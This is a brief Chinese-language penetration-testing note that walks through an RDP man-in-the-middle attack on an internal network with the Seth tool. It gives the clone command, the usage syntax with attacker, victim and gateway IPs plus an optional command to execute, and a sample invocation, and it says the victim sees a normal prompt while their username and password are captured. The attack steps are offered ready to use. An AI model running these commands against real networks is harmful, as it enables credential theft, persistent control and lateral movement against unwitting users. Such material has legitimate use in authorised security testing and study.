前言:靠着网上的资源一点一点的啃。
内网渗透中,发觉有机器开了远程桌面,可以使用RDP中间人攻击进行持久控制和横向渗透。 攻击成功具备的条件
同一个网段知道连接者ip,被连接ip。 工具:Seth
git clone https://github.com/SySS-Research/Seth.git
使用方法
./seth.sh
<INTERFACE
> <ATTACKER_IP
> <VICTIM_IP
> <GATEWAY_IP
|HOST_IP
> [<COMMAND
>]
用法介绍: INTERFACE:网卡 ATTACKER IP:中间人ip VICTIM IP:连接者ip GATEWAY IP|HOST IP:被连接ip COMMAND:启动时执行的命令
./seth.sh eth0 192.168.202.
{133,1,135
}
连接时像正常的提示 获取到用户名和密码
